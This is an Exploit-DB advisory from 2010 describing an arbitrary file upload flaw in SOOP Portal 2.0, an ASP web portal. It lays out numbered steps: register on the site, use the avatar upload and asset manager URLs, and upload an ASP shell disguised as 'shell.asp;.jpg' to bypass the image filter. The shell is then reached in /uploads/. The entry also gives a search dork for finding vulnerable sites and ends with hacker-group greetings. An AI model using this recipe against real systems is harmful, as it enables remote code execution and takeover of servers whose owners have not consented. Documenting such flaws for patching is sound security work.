SOOP Portal 2.0 - Arbitrary File Upload

EDB-ID:

15690

CVE:

N/A




Platform:

ASP

Date:

2010-12-05


#################################################################
#                           I N F O
# Exploit Title: SOOP Portal 2.0 Remote Upload Shell Vulnerability
# DDate: 05-12-2010
# Author: Net.Edit0r
# Software Link: www.soopportal.com
# Version: 2.0
# Tested on: windows server 2008
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com

[~]#########################################  E X P L O I T
#############################################[~]
#
#  1. Register On Site
#
#  2. http://server/member_form.asp?do=5&mid=4
#
#  3. Current avatar [ Browse/Upload ]
#
#  4. http://server/assetman3.asp?mode=1&ffilter=image
#
#  4. Asp renamed via the .asp;.jpg (shell.asp;.jpg)
#
#  5. http://server/uploads/ [You can get the address at the
See Shell Shell upload]
#
#  6. In this section, file in the folder that you have selected in
the previous section is placed .
#
#  7 . Example URL : http://server/uploads/
#
#  Dork : "SOOP Portal 2.0"
#
#
[~]#########################################  ThankS To ...
###########################################[~]
#
# Special Thanks To : HUrr!c4nE, Cair3x, B3hz4d, M4hd1,
Skitt3r,Hussin-v ,Virus_Baghdad ,snIPer alBlDeat
#
# 7-Team: virangar, H-SK33PY , farzadho ,n3me3iz ,mmilad200 , fr0nk,
bLaCk.bytE , Satanic2000
#
# BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic  ~ keracker ~ Mikili
#
[~]#########################################   FinisH :D
#############################################[~]